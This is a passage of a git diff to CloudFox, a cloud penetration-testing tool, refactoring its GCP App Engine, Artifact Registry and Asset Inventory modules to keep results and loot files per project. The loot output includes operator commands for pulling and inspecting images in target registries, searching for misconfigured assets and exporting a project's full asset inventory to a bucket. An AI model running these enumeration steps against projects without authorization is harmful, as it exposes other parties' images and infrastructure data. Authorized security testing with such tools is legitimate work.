+ if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = AppEngineOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_APPENGINE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *AppEngineModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allApps := m.getAllApps() + allVersions := m.getAllVersions() + allFirewallRules := m.getAllFirewallRules() + + // Use empty projectID since we're building for all projects + tables := m.buildTablesForProject("", allApps, allVersions, allFirewallRules) + + // Collect all loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index ed393abd..57e904b0 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -45,11 +45,11 @@ type ArtifactRegistryModule struct { gcpinternal.BaseGCPModule // Module-specific fields - Artifacts []ArtifactRegistryService.ArtifactInfo - Repositories []ArtifactRegistryService.RepositoryInfo - LootMap map[string]*internal.LootFile - client *artifactregistry.Client - mu sync.Mutex + ProjectArtifacts map[string][]ArtifactRegistryService.ArtifactInfo // projectID -> artifacts + ProjectRepositories map[string][]ArtifactRegistryService.RepositoryInfo // projectID -> repos + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + client *artifactregistry.Client + mu sync.Mutex } // ------------------------------ @@ -83,16 +83,13 @@ func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { // Create module instance module := &ArtifactRegistryModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Artifacts: []ArtifactRegistryService.ArtifactInfo{}, - Repositories: []ArtifactRegistryService.RepositoryInfo{}, - LootMap: make(map[string]*internal.LootFile), - client: client, + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectArtifacts: make(map[string][]ArtifactRegistryService.ArtifactInfo), + ProjectRepositories: make(map[string][]ArtifactRegistryService.RepositoryInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + client: client, } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -104,18 +101,39 @@ func (m *ArtifactRegistryModule) Execute(ctx context.Context, logger internal.Lo // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, m.processProject) + allRepos := m.getAllRepositories() + allArtifacts := m.getAllArtifacts() + // Check results - if len(m.Repositories) == 0 && len(m.Artifacts) == 0 { + if len(allRepos) == 0 && len(allArtifacts) == 0 { logger.InfoM("No artifact registries found", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d repository(ies) with %d artifact(s)", len(m.Repositories), len(m.Artifacts)), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d repository(ies) with %d artifact(s)", len(allRepos), len(allArtifacts)), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) // Write output m.writeOutput(ctx, logger) } +// getAllRepositories returns all repositories from all projects +func (m *ArtifactRegistryModule) getAllRepositories() []ArtifactRegistryService.RepositoryInfo { + var all []ArtifactRegistryService.RepositoryInfo + for _, repos := range m.ProjectRepositories { + all = append(all, repos...) + } + return all +} + +// getAllArtifacts returns all artifacts from all projects +func (m *ArtifactRegistryModule) getAllArtifacts() []ArtifactRegistryService.ArtifactInfo { + var all []ArtifactRegistryService.ArtifactInfo + for _, artifacts := range m.ProjectArtifacts { + all = append(all, artifacts...) + } + return all +} + // ------------------------------ // Project Processor (called concurrently for each project) // ------------------------------ @@ -134,17 +152,26 @@ func (m *ArtifactRegistryModule) processProject(ctx context.Context, projectID s return } - // Thread-safe append + // Thread-safe store per-project m.mu.Lock() - m.Repositories = append(m.Repositories, result.Repositories...) - m.Artifacts = append(m.Artifacts, result.Artifacts...) + m.ProjectRepositories[projectID] = result.Repositories + m.ProjectArtifacts[projectID] = result.Artifacts + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["artifact-registry-commands"] = &internal.LootFile{ + Name: "artifact-registry-commands", + Contents: "# GCP Artifact Registry Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } // Generate loot for each repository and artifact for _, repo := range result.Repositories { - m.addRepositoryToLoot(repo) + m.addRepositoryToLoot(projectID, repo) } for _, artifact := range result.Artifacts { - m.addArtifactToLoot(artifact) + m.addArtifactToLoot(projectID, artifact) } m.mu.Unlock() @@ -156,14 +183,12 @@ func (m *ArtifactRegistryModule) processProject(ctx context.Context, projectID s // ------------------------------ // Loot File Management // ------------------------------ -func (m *ArtifactRegistryModule) initializeLootFiles() { - m.LootMap["artifact-registry-commands"] = &internal.LootFile{ - Name: "artifact-registry-commands", - Contents: "# GCP Artifact Registry Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *ArtifactRegistryModule) addRepositoryToLoot(projectID string, repo ArtifactRegistryService.RepositoryInfo) { + lootFile := m.LootMap[projectID]["artifact-registry-commands"] + if lootFile == nil { + return } -} -func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryService.RepositoryInfo) { // Extract repo name from full path repoName := repo.Name parts := strings.Split(repo.Name, "/") @@ -173,7 +198,7 @@ func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryServic // Handle legacy Container Registry differently if repo.RegistryType == "container-registry" { - m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Legacy Container Registry: %s (Project: %s)\n"+ "# Note: Consider migrating to Artifact Registry\n"+ "# Configure Docker authentication:\n"+ @@ -191,7 +216,7 @@ func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryServic } // Repository header and enumeration commands - m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Repository: %s (Project: %s, Location: %s)\n"+ "# Format: %s, Mode: %s, Encryption: %s, Public: %s\n"+ "# Describe repository:\n"+ @@ -206,7 +231,7 @@ func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryServic // Docker-specific commands if repo.Format == "DOCKER" { - m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Configure Docker authentication:\n"+ "gcloud auth configure-docker %s-docker.pkg.dev\n"+ "# List images:\n"+ @@ -219,16 +244,21 @@ func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryServic ) } - m.LootMap["artifact-registry-commands"].Contents += "\n" + lootFile.Contents += "\n" } -func (m *ArtifactRegistryModule) addArtifactToLoot(artifact ArtifactRegistryService.ArtifactInfo) { +func (m *ArtifactRegistryModule) addArtifactToLoot(projectID string, artifact ArtifactRegistryService.ArtifactInfo) { + lootFile := m.LootMap[projectID]["artifact-registry-commands"] + if lootFile == nil { + return + } + // Exploitation commands for Docker images if artifact.Format == "DOCKER" { imageBase := fmt.Sprintf("%s-docker.pkg.dev/%s/%s/%s", artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name) - m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Docker Image: %s (Project: %s)\n"+ "# Repository: %s, Location: %s\n"+ "# Digest: %s\n", @@ -240,7 +270,7 @@ func (m *ArtifactRegistryModule) addArtifactToLoot(artifact ArtifactRegistryServ // Generate commands for each tag if len(artifact.Tags) > 0 { for _, tag := range artifact.Tags { - m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Tag: %s\n"+ "docker pull %s:%s\n"+ "docker inspect %s:%s\n"+ @@ -253,7 +283,7 @@ func (m *ArtifactRegistryModule) addArtifactToLoot(artifact ArtifactRegistryServ } } else { // No tags, use digest - m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# No tags - use digest\n"+ "docker pull %s@%s\n"+ "docker inspect %s@%s\n"+ @@ -270,8 +300,29 @@ func (m *ArtifactRegistryModule) addArtifactToLoot(artifact ArtifactRegistryServ // Output Generation // ------------------------------ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Repository table with IAM columns (one row per IAM member) - repoHeader := []string{ + // Count public repos for finding message + publicCount := 0 + for _, repos := range m.ProjectRepositories { + for _, repo := range repos { + if repo.IsPublic { + publicCount++ + } + } + } + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible repository(ies)!", publicCount), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getRepoHeader returns the header for repository table +func (m *ArtifactRegistryModule) getRepoHeader() []string { + return []string{ "Project ID", "Project Name", "Name", @@ -280,14 +331,31 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna "Mode", "Public", "Encryption", - "Role", - "Member Type", - "Member", + "Resource Role", + "Principal Type", + "Resource Principal", } +} - var repoBody [][]string - publicCount := 0 - for _, repo := range m.Repositories { +// getArtifactHeader returns the header for artifact table +func (m *ArtifactRegistryModule) getArtifactHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Name", + "Repository", + "Location", + "Tags", + "Digest", + "Size", + "Uploaded", + } +} + +// reposToTableBody converts repositories to table body rows +func (m *ArtifactRegistryModule) reposToTableBody(repos []ArtifactRegistryService.RepositoryInfo) [][]string { + var body [][]string + for _, repo := range repos { // Extract repo name from full path repoName := repo.Name parts := strings.Split(repo.Name, "/") @@ -299,7 +367,6 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna publicDisplay := "" if repo.IsPublic { publicDisplay = repo.PublicAccess - publicCount++ } // Shorten mode for display @@ -312,7 +379,7 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna for _, binding := range repo.IAMBindings { for _, member := range binding.Members { memberType := ArtifactRegistryService.GetMemberType(member) - repoBody = append(repoBody, []string{ + body = append(body, []string{ repo.ProjectID, m.GetProjectName(repo.ProjectID), repoName, @@ -329,7 +396,7 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna } } else { // Repository with no IAM bindings - repoBody = append(repoBody, []string{ + body = append(body, []string{ repo.ProjectID, m.GetProjectName(repo.ProjectID), repoName, @@ -344,22 +411,13 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna }) } } + return body +} - // Artifact table - artifactHeader := []string{ - "Project ID", - "Project Name", - "Name", - "Repository", - "Location", - "Tags", - "Digest", - "Size", - "Uploaded", - } - - var artifactBody [][]string - for _, artifact := range m.Artifacts { +// artifactsToTableBody converts artifacts to table body rows +func (m *ArtifactRegistryModule) artifactsToTableBody(artifacts []ArtifactRegistryService.ArtifactInfo) [][]string { + var body [][]string + for _, artifact := range artifacts { // Format tags tags := "-" if len(artifact.Tags) > 0 { @@ -370,49 +428,129 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna } } - digest := artifact.Digest - - artifactBody = append(artifactBody, []string{ + body = append(body, []string{ artifact.ProjectID, m.GetProjectName(artifact.ProjectID), artifact.Name, artifact.Repository, artifact.Location, tags, - digest, + artifact.Digest, artifact.SizeBytes, artifact.Uploaded, }) } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) +// buildTablesForProject builds table files for a project +func (m *ArtifactRegistryModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if repos, ok := m.ProjectRepositories[projectID]; ok && len(repos) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getRepoHeader(), + Body: m.reposToTableBody(repos), + }) + } + + if artifacts, ok := m.ProjectArtifacts[projectID]; ok && len(artifacts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getArtifactHeader(), + Body: m.artifactsToTableBody(artifacts), + }) + } + + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *ArtifactRegistryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectRepositories { + tableFiles := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ArtifactRegistryOutput{Table: tableFiles, Loot: lootFiles} + } + + // Also add projects that only have artifacts + for projectID := range m.ProjectArtifacts { + if _, exists := outputData.ProjectLevelData[projectID]; !exists { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ArtifactRegistryOutput{Table: tableFiles, Loot: lootFiles} } } - // Build table files - tableFiles := []internal.TableFile{ - { - Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), - Header: repoHeader, - Body: repoBody, - }, + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + m.CommandCounter.Error++ } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *ArtifactRegistryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allRepos := m.getAllRepositories() + allArtifacts := m.getAllArtifacts() + + // Build table files + tableFiles := []internal.TableFile{{ + Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getRepoHeader(), + Body: m.reposToTableBody(allRepos), + }} - // Add artifacts table if there are any - if len(artifactBody) > 0 { + if len(allArtifacts) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), - Header: artifactHeader, - Body: artifactBody, + Header: m.getArtifactHeader(), + Body: m.artifactsToTableBody(allArtifacts), }) } - if publicCount > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible repository(ies)!", publicCount), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } output := ArtifactRegistryOutput{ @@ -431,9 +569,9 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames + "project", + m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go index 77b31f6f..d869ade1 100644 --- a/gcp/commands/assetinventory.go +++ b/gcp/commands/assetinventory.go @@ -80,12 +80,12 @@ type CrossProjectResource struct { type AssetInventoryModule struct { gcpinternal.BaseGCPModule - Assets []assetservice.AssetInfo - TypeCounts []assetservice.AssetTypeCount - Dependencies []ResourceDependency - CrossProject []CrossProjectResource - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectAssets map[string][]assetservice.AssetInfo // projectID -> assets + ProjectTypeCounts map[string][]assetservice.AssetTypeCount // projectID -> counts + ProjectDependencies map[string][]ResourceDependency // projectID -> dependencies + CrossProject []CrossProjectResource // global (cross-project by nature) + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type AssetInventoryOutput struct { @@ -103,17 +103,65 @@ func runGCPAssetInventoryCommand(cmd *cobra.Command, args []string) { } module := &AssetInventoryModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Assets: []assetservice.AssetInfo{}, - TypeCounts: []assetservice.AssetTypeCount{}, - Dependencies: []ResourceDependency{}, - CrossProject: []CrossProjectResource{}, - LootMap: make(map[string]*internal.LootFile), - } - module.initializeLootFiles() + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAssets: make(map[string][]assetservice.AssetInfo), + ProjectTypeCounts: make(map[string][]assetservice.AssetTypeCount), + ProjectDependencies: make(map[string][]ResourceDependency), + CrossProject: []CrossProjectResource{}, + LootMap: make(map[string]map[string]*internal.LootFile), + } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } +func (m *AssetInventoryModule) getAllAssets() []assetservice.AssetInfo { + var all []assetservice.AssetInfo + for _, assets := range m.ProjectAssets { + all = append(all, assets...) + } + return all +} + +func (m *AssetInventoryModule) getAllTypeCounts() []assetservice.AssetTypeCount { + // Merge counts from all projects + countMap := make(map[string]int) + for _, counts := range m.ProjectTypeCounts { + for _, c := range counts { + countMap[c.AssetType] += c.Count + } + } + + var all []assetservice.AssetTypeCount + for assetType, count := range countMap { + all = append(all, assetservice.AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + return all +} + +func (m *AssetInventoryModule) getAllDependencies() []ResourceDependency { + var all []ResourceDependency + for _, deps := range m.ProjectDependencies { + all = append(all, deps...) + } + return all +} + +func (m *AssetInventoryModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["asset-inventory-details"] = &internal.LootFile{ + Name: "asset-inventory-details", + Contents: "# Cloud Asset Inventory Details\n# Generated by CloudFox\n\n", + } + m.LootMap[projectID]["asset-inventory-commands"] = &internal.LootFile{ + Name: "asset-inventory-commands", + Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n\n", + } + } +} + func (m *AssetInventoryModule) Execute(ctx context.Context, logger internal.Logger) { // If --all is set, enable all flags if showAll { @@ -144,17 +192,19 @@ func (m *AssetInventoryModule) Execute(ctx context.Context, logger internal.Logg // Build summary message var summaryParts []string - if len(m.TypeCounts) > 0 { - summaryParts = append(summaryParts, fmt.Sprintf("%d asset type(s)", len(m.TypeCounts))) + allTypeCounts := m.getAllTypeCounts() + if len(allTypeCounts) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset type(s)", len(allTypeCounts))) } - if len(m.Assets) > 0 { - summaryParts = append(summaryParts, fmt.Sprintf("%d asset(s)", len(m.Assets))) + allAssets := m.getAllAssets() + if len(allAssets) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset(s)", len(allAssets))) } if checkIAM { publicCount := 0 - for _, asset := range m.Assets { + for _, asset := range allAssets { if asset.PublicAccess { publicCount++ } @@ -164,8 +214,9 @@ func (m *AssetInventoryModule) Execute(ctx context.Context, logger internal.Logg } } - if len(m.Dependencies) > 0 { - summaryParts = append(summaryParts, fmt.Sprintf("%d dependencies", len(m.Dependencies))) + allDeps := m.getAllDependencies() + if len(allDeps) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d dependencies", len(allDeps))) } if len(m.CrossProject) > 0 { @@ -186,6 +237,10 @@ func (m *AssetInventoryModule) processProject(ctx context.Context, projectID str logger.InfoM(fmt.Sprintf("Enumerating assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) } + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + svc := assetservice.New() assets, err := svc.ListAssets(projectID, assetTypes) if err != nil { @@ -196,9 +251,9 @@ func (m *AssetInventoryModule) processProject(ctx context.Context, projectID str } m.mu.Lock() - m.Assets = append(m.Assets, assets...) + m.ProjectAssets[projectID] = append(m.ProjectAssets[projectID], assets...) for _, asset := range assets { - m.addToLoot(asset) + m.addToLoot(projectID, asset) } m.mu.Unlock() } @@ -208,6 +263,10 @@ func (m *AssetInventoryModule) processProjectIAM(ctx context.Context, projectID logger.InfoM(fmt.Sprintf("Enumerating assets with IAM in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) } + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + svc := assetservice.New() assets, err := svc.ListAssetsWithIAM(projectID, assetTypes) if err != nil { @@ -218,9 +277,9 @@ func (m *AssetInventoryModule) processProjectIAM(ctx context.Context, projectID } m.mu.Lock() - m.Assets = append(m.Assets, assets...) + m.ProjectAssets[projectID] = append(m.ProjectAssets[projectID], assets...) for _, asset := range assets { - m.addToLoot(asset) + m.addToLoot(projectID, asset) } m.mu.Unlock() } @@ -230,6 +289,10 @@ func (m *AssetInventoryModule) processProjectCounts(ctx context.Context, project logger.InfoM(fmt.Sprintf("Counting assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) } + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + svc := assetservice.New() counts, err := svc.GetAssetTypeCounts(projectID) if err != nil { @@ -240,22 +303,7 @@ func (m *AssetInventoryModule) processProjectCounts(ctx context.Context, project } m.mu.Lock() - // Merge counts from multiple projects - countMap := make(map[string]int) - for _, c := range m.TypeCounts { - countMap[c.AssetType] = c.Count - } - for _, c := range counts { - countMap[c.AssetType] += c.Count - } - - m.TypeCounts = []assetservice.AssetTypeCount{} - for assetType, count := range countMap { - m.TypeCounts = append(m.TypeCounts, assetservice.AssetTypeCount{ - AssetType: assetType, - Count: count, - }) - } + m.ProjectTypeCounts[projectID] = counts m.mu.Unlock() } @@ -294,6 +342,10 @@ func (m *AssetInventoryModule) processProjectWithDependencies(ctx context.Contex logger.InfoM(fmt.Sprintf("Analyzing dependencies in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) } + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + parent := fmt.Sprintf("projects/%s", projectID) req := &assetpb.ListAssetsRequest{ Parent: parent, @@ -328,7 +380,7 @@ func (m *AssetInventoryModule) processProjectWithDependencies(ctx context.Contex } m.mu.Lock() - m.Assets = append(m.Assets, assetInfo) + m.ProjectAssets[projectID] = append(m.ProjectAssets[projectID], assetInfo) m.mu.Unlock() // Analyze dependencies @@ -372,7 +424,7 @@ func (m *AssetInventoryModule) analyzeAssetDependencies(assetItem *assetpb.Asset } m.mu.Lock() - m.Dependencies = append(m.Dependencies, dependency) + m.ProjectDependencies[projectID] = append(m.ProjectDependencies[projectID], dependency) m.mu.Unlock() } } @@ -409,7 +461,8 @@ func (m *AssetInventoryModule) analyzeCrossProjectResources() { targetToSources := make(map[string][]string) targetToType := make(map[string]string) - for _, dep := range m.Dependencies { + allDeps := m.getAllDependencies() + for _, dep := range allDeps { targetProject := m.extractProjectFromResource(dep.TargetResource) if targetProject != "" && targetProject != dep.ProjectID { targetToSources[dep.TargetResource] = append(targetToSources[dep.TargetResource], dep.ProjectID) @@ -464,220 +517,321 @@ func (m *AssetInventoryModule) generateQueryTemplates() { {"GKE Clusters - Legacy Auth", "Find GKE clusters with legacy authentication", `resource.type="container.googleapis.com/Cluster" AND resource.data.legacyAbac.enabled=true`}, } - for _, t := range templates { - m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( - "# %s - %s\ngcloud asset search-all-resources --scope=projects/PROJECT_ID --query='%s'\n\n", - t.Name, t.Description, t.Query, - ) - } - - // Add export commands - m.LootMap["asset-inventory-commands"].Contents += "# Export complete asset inventory\n" + // Add templates and export commands to each project's loot for _, projectID := range m.ProjectIDs { - m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( - "gcloud asset export --project=%s --content-type=resource --output-path=gs://BUCKET_NAME/%s-assets.json\n", - projectID, projectID, - ) + m.mu.Lock() + m.initializeLootForProject(projectID) + + if lootFile := m.LootMap[projectID]["asset-inventory-commands"]; lootFile != nil { + for _, t := range templates { + lootFile.Contents += fmt.Sprintf( + "# %s - %s\ngcloud asset search-all-resources --scope=projects/%s --query='%s'\n\n", + t.Name, t.Description, projectID, t.Query, + ) + } + + lootFile.Contents += "# Export complete asset inventory\n" + lootFile.Contents += fmt.Sprintf( + "gcloud asset export --project=%s --content-type=resource --output-path=gs://BUCKET_NAME/%s-assets.json\n", + projectID, projectID, + ) + } + m.mu.Unlock() } } -func (m *AssetInventoryModule) initializeLootFiles() { - m.LootMap["asset-inventory-details"] = &internal.LootFile{ - Name: "asset-inventory-details", - Contents: "# Cloud Asset Inventory Details\n# Generated by CloudFox\n\n", +func (m *AssetInventoryModule) addToLoot(projectID string, asset assetservice.AssetInfo) { + if lootFile := m.LootMap[projectID]["asset-inventory-details"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Asset: %s\n# Type: %s\n# Project: %s\n# Location: %s\n", + asset.Name, asset.AssetType, asset.ProjectID, asset.Location) + + if asset.PublicAccess { + lootFile.Contents += "# Public Access: Yes\n" + } + lootFile.Contents += "\n" } - m.LootMap["asset-inventory-commands"] = &internal.LootFile{ - Name: "asset-inventory-commands", - Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n\n", +} + +func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) } } -func (m *AssetInventoryModule) addToLoot(asset assetservice.AssetInfo) { - m.LootMap["asset-inventory-details"].Contents += fmt.Sprintf( - "# Asset: %s\n# Type: %s\n# Project: %s\n# Location: %s\n", - asset.Name, asset.AssetType, asset.ProjectID, asset.Location) +func (m *AssetInventoryModule) buildCountsTable(counts []assetservice.AssetTypeCount) *internal.TableFile { + if len(counts) == 0 { + return nil + } + + // Sort by count descending + sort.Slice(counts, func(i, j int) bool { + return counts[i].Count > counts[j].Count + }) - if asset.PublicAccess { - m.LootMap["asset-inventory-details"].Contents += "# Public Access: Yes\n" + header := []string{"Asset Type", "Count"} + var body [][]string + for _, tc := range counts { + body = append(body, []string{ + tc.AssetType, + fmt.Sprintf("%d", tc.Count), + }) + } + + return &internal.TableFile{ + Name: "asset-counts", + Header: header, + Body: body, } - m.LootMap["asset-inventory-details"].Contents += "\n" } -func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { +func (m *AssetInventoryModule) buildAssetsTable(assets []assetservice.AssetInfo) []internal.TableFile { var tables []internal.TableFile + if len(assets) == 0 { + return tables + } - // Asset counts table (if we have counts) - if len(m.TypeCounts) > 0 { - // Sort by count descending - sort.Slice(m.TypeCounts, func(i, j int) bool { - return m.TypeCounts[i].Count > m.TypeCounts[j].Count - }) - - header := []string{"Asset Type", "Count"} + if checkIAM { + header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location", "Resource Role", "Resource Principal", "Public"} var body [][]string - for _, tc := range m.TypeCounts { - body = append(body, []string{ - tc.AssetType, - fmt.Sprintf("%d", tc.Count), - }) + for _, asset := range assets { + publicAccess := "No" + if asset.PublicAccess { + publicAccess = "Yes" + } + + if len(asset.IAMBindings) == 0 { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + binding.Role, + member, + publicAccess, + }) + } + } + } } tables = append(tables, internal.TableFile{ - Name: "asset-counts", + Name: "assets", Header: header, Body: body, }) - } - - // Assets table (if we have assets) - if len(m.Assets) > 0 { - if checkIAM { - // When checking IAM, show one row per IAM binding member - header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location", "Role", "Member", "Public"} - - var body [][]string - for _, asset 